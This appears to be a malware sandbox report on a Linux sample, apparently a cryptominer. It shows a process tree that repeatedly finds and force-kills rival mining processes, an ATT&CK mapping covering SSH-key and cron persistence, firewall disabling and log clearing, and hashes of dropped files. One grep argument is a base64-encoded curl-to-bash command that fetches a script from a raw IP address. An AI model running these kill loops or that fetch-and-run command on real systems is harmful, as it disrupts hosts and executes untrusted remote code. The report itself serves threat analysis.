/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep Y3VybCAtcyBodHRwOi8vMTA3LjE3NC40Ny4xNTYvbXIuc2ggfCBiYXNoIC1zaAo2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep sustse2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep sustse32⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep wget2⤵
-
-
/bin/grepgrep mr.sh2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep curl2⤵
-
-
/bin/grepgrep mr.sh2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep wget2⤵
-
-
/bin/grepgrep 2mr.sh2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep curl2⤵
-
-
/bin/grepgrep 2mr.sh2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep wget2⤵
-
-
/bin/grepgrep cr5.sh2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep curl2⤵
-
-
/bin/grepgrep cr5.sh2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep wget2⤵
-
-
/bin/grepgrep logo9.jpg2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep curl2⤵
-
-
/bin/grepgrep logo9.jpg2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep j2.conf2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep wget2⤵
-
-
/bin/grepgrep luk-cpu2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep curl2⤵
-
-
/bin/grepgrep luk-cpu2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep wget2⤵
-
-
/bin/grepgrep ficov2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep curl2⤵
-
-
/bin/grepgrep ficov2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep wget2⤵
-
-
/bin/grepgrep he.sh2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep curl2⤵
-
-
/bin/grepgrep he.sh2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep wget2⤵
-
-
/bin/grepgrep miner.sh2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Account Manipulation
1SSH Authorized Keys
1Boot or Logon Autostart Execution
1Boot or Logon Initialization Scripts
1RC Scripts
1Scheduled Task/Job
1Cron
1Privilege Escalation
Account Manipulation
1SSH Authorized Keys
1Boot or Logon Autostart Execution
1Boot or Logon Initialization Scripts
1RC Scripts
1Scheduled Task/Job
1Cron
1Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Impair Defenses
2Disable or Modify System Firewall
1Disable or Modify Tools
1Indicator Removal
2Clear Linux or Mac System Logs
2Virtualization/Sandbox Evasion
2System Checks
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
13B
MD53d47b8e895a71930bda5d4f3d8fc8589
SHA1efbaf468b81abb6b465ca12f35fa067bae1b4f10
SHA256be167c52e59f0a02ca6841074d9e73205b2f7898ad73d405c7b96f9efb440c36
SHA512bd109ac68d85a8451187e31b8ec62dbc062d3fa2aab866928b094b64318912c7056f42ca363b01af74b1898f84d2675f3099d1aab72140b6ba932a16257aa5eb
-
Filesize
52B
MD5f668da8f0525cbe5a545869cb5776913
SHA1996e6afed4498ff8a92a64330de018141af102c9
SHA256db7a08cba996d62b1fe07727ba58b98d7b59778bd7227c9b7fd69bc587d2557f
SHA512f918ba58e9af19704344c92ec356d215080f47d66b175f3d712d31e54e1b9e4e46daeb0556d82b0722ae01b8cfe456f08021e73b053ced6326735e1d0b73c700
-
Filesize
56B
MD5896f6d504f181bd883a90b84069bcf70
SHA186fd682d1932d9e14461796e5f0fe776b8ce9d5c
SHA256b6eec955fd5b0e9ddf43ef55b7fe74075cc1a935ab896d5cd0a55429ef0d6d25
SHA5121f705ceead76868a79abb7ea42efad35e37b95421bfc81ce4540e4beeb7cbc0ccadfaae85794b6945c93304da9948d9d63504f9377ca3e92b874cc3f691d3c1a
-
Filesize
53B
MD56956a4d6a2444151c11a73517215cb34
SHA1b279ad496f640f44418aa7e5e27a4d458bddb7fb
SHA256561941bdd6305a389e688a1214acd9163478301738158f13349ea403dfae300c
SHA512ee1a27243159cf9aa99ed0ff79ae1f6d66c698f668e0c233544f1a79aab5bb8ca6edb051d907aef8b50ff85f39aa41b21e951476c3a53b6a85a7a06adc28ed8d
-
Filesize
53B
MD53a615a3d1952b1e2c0cb584bd253f7f9
SHA179465a5e611f19f140f169ac5bc3a9ab382696ef
SHA256ff1d557b85a902fbe4d2d0b0f3e79307f1f7e6dc36c537a824e920c5e8ece2de
SHA5128819cd4ef33fe59b8618ac7a2f116169b2effeb87f2353b674ef08c8297dbbda75112c5dd882c60b05c9cedeab0aa3dd79e06923b2a2db0cad8a3ec2b6c5532e
-
Filesize
50B
MD5b2ecca8d419b5c3fa2ee7621efa75eb7
SHA13adc58bd314dea94eebfd1582ffc8bbbb5cfb34e
SHA256e15357c9d6df46a6b43036e8f646311f88019e587b8d55a8aecfa438cd971545
SHA512c6a7d05b7f615de3946055be8a4995c0fb8c670fe53c8a8dcba98f32c2ec4cb92a93524aebaca97c9b6e8696b71bdc2114d6ec303bff4ec288745bae15522e69
-
Filesize
2KB
MD5633a89c83a384960505b88a376b5f4ca
SHA1b8e153142f5b909c11d3f498e13bc025c69d3083
SHA25626aa538965f6d3b9795aa0c4a1eb35cd51f62ede2262007b4ac4aad2e7d0a945
SHA512ff7acd23ca162ed3f260547bb1f3953d017eca4023f16c33be533de5465600f922c190e748a6d7e9bcda612df2c52a1fe709db203a9360a02b1fc3d0ca719eb4
-
Filesize
2.5MB
MD53af52960186531a27666f8e13e9fc791
SHA17407ce5235985454654c33475c8166f3c064ad1a
SHA256df9ffb59477862540a40c02121561550f3c58507e70d6da0d3d8a786761ebb42
SHA512c6eaea0af6b7c9128021333b8faf99dad013f0dbba26850b64d44e07baea5df94d4cbefc3d2cfc29fd930f3534660f544c5636c092d3926e55f7bd84b3f07c82
-
Filesize
9B
MD5970d39f8690eff0fe573e7bcf51bda9b
SHA146f8f835d3d3d41f063d0e8346260bb622b01a3f
SHA2567e3735835710cbbb54a0bee4a323c83c54cb1f4f60463b9cf88006946fe2b9a5
SHA51224952be3e8e47ffb4ee83d55f513edf041f6c4e420e2f52bdbdf0daee4c5735ad3ee5ed863f95ffa931a70d551590a7fe6ae67dc22f32060793e2525e4b56cd0
-
Filesize
2B
MD5b026324c6904b2a9cb4b88d6d61c81d1
SHA1e5fa44f2b31c1fb553b6021e7360d07d5d91ff5e
SHA2564355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865
SHA5123abb6677af34ac57c0ca5828fd94f9d886c26ce59a8ce60ecf6778079423dccff1d6f19cb655805d56098e6d38a1a710dee59523eed7511e5a9e4b8ccb3a4686
-
Filesize
1B
MD568b329da9893e34099c7d8ad5cb9c940
SHA1adc83b19e793491b1c6ea0fd8b46cd9f32e592fc
SHA25601ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b
SHA512be688838ca8686e5c90689bf2ab585cef1137c999b48c70b92f67a5c34dc15697b5d11c982ed6d71be1e1e7f7b4e0733884aa97c3f7a339a8ed03577cf74be09
-
Filesize
557B
MD512bf68ad9999dcbc8bd1d9a728d600aa
SHA17f302d2df5e075f879586cb0ab1dcc0b0870cc98
SHA256cfc3a74939edac785d66664757b3c877a7e5f4fae29b3a5bdf8b55e79573dfb5
SHA512ef6a8c50fd411622eefae30bfcc962368f355ec897b0136b2290784344ce735c3b3d51feda679e3c42ab524197d6515f1f8699e17598171a1b888b0fbe5229e7
-
Filesize
235KB
MD5373fe2f2ef99005d2550a482f09a3e51
SHA168e6572b55b1e77f7d171ebac7b2579b7a6bd51d
SHA2567552d5ab0c3879756a860aaab8e7c2f8ffb9409ea9ff9e65fc046ba5c519ebe5
SHA512def9e854b824d2fddc6a15f898be73cfb679ac38563f5af854546f49c9d5d2316a40176dc41d6b360bda7b65de53863a53e4eedadf6336000b031b77a113607b
-
Filesize
2B
MD56d7fce9fee471194aa8b5b6e47267f03
SHA1a3db5c13ff90a36963278c6a39e4ee3c22e2a436
SHA2561121cfccd5913f0a63fec40a6ffd44ea64f9dc135c66634ba001d10bcf4302a2
SHA5122b59d179d9815994f687383a886ea34109889756efca5ab27318cc67ce2a21261d12fa6fee6b8c716f72214ead55ee0d789d6c35cff977d40ef5728ba9188a80
-
Filesize
2B
MD526ab0db90d72e28ad0ba1e22ee510510
SHA17448d8798a4380162d4b56f9b452e2f6f9e24e7a
SHA25653c234e5e8472b6ac51c1ae1cab3fe06fad053beb8ebfd8977b010655bfdd3c3
SHA51263e22ec2fbeebabf005e58fbfb0eee607c4aa417045a68a0cc63767b048e3559268d35e72f367d3b2dbd5dbddf12fc4397762ba149260b3795a0391713bddcd7
-
Filesize
2B
MD59ae0ea9e3c9c6e1b9b6252c8395efdc1
SHA1ccf271b7830882da1791852baeca1737fcbe4b90
SHA25606e9d52c1720fca412803e3b07c4b228ff113e303f4c7ab94665319d832bbfb7
SHA512f3d08a4bfef201adbe711e8805f96ff13909719107dcac81f4fc9185040d59d8d573344a0707e697f8b4f0212e0d79f3bdd6b86688dd8c54019b9d93c937f3ca
-
Filesize
2B
MD548a24b70a0b376535542b996af517398
SHA19c6b057a2b9d96a4067a749ee3b3b0158d390cf1
SHA2567de1555df0c2700329e815b93b32c571c3ea54dc967b89e81ab73b9972b72d1d
SHA512db545c410fd0c8ede533d5b0666cd2798ba380bd25b655619cd5fd3a33a255569b3ccc319bfdef3322d8392d894d15c2e6aa2d53346e6ac54eaf5d627bfe6a9a
-
Filesize
2B
MD51dcca23355272056f04fe8bf20edfce0
SHA15d9474c0309b7ca09a182d888f73b37a8fe1362c
SHA256f0b5c2c2211c8d67ed15e75e656c7862d086e9245420892a7de62cd9ec582a06
SHA51229b3573989378848e91465abb8bb12aaad1c40f01ddba6ce5dce4de88d61d49621cd4272bc6f889cd469e9490040b412eb0a237cf2cd49c637da1d5de5903f3d